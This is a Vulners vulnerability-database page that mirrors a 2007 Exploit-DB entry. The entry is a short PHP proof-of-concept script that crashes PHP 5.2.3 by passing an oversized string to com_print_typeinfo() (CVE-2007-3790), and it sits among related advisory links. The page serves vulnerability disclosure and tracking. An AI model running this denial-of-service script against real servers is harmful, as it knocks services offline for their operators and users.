Lucene search
+L

PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service

🗓️ 12 Jul 2007 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

PHP 5.2.3 'bz2 com_print_typeinfo()' Denial of Service exploit by shinna

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-3790
15 Jul 200723:00
cve
cvelist
Cvelist
CVE-2007-3790
15 Jul 200723:00
cvelist
euvd
EUVD
EUVD-2007-3774
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-3790
15 Jul 200723:30
nvd
openvas
OpenVAS
PHP < 5.2.4 Multiple Vulnerabilities
17 Aug 202000:00
openvas
nessus
Tenable Nessus
PHP < 5.2.4 Multiple Vulnerabilities
3 Sep 200700:00
nessus
prion
Prion
Design/Logic Flaw
15 Jul 200723:30
prion
redhatcve
RedhatCVE
CVE-2007-3790
30 Oct 201509:20
redhatcve
susecve
SUSE CVE
SUSE CVE-2007-3790
15 Feb 202306:11
susecve
ubuntucve
UbuntuCve
CVE-2007-3790
15 Jul 200723:30
ubuntucve
Rows per page
<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp sp2, worked both from the cli and on apache

//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar

if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}

$buff = str_repeat("a",1000);

com_print_typeinfo($buff);

?>

# milw0rm.com [2007-07-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.8
EPSS0.03017
28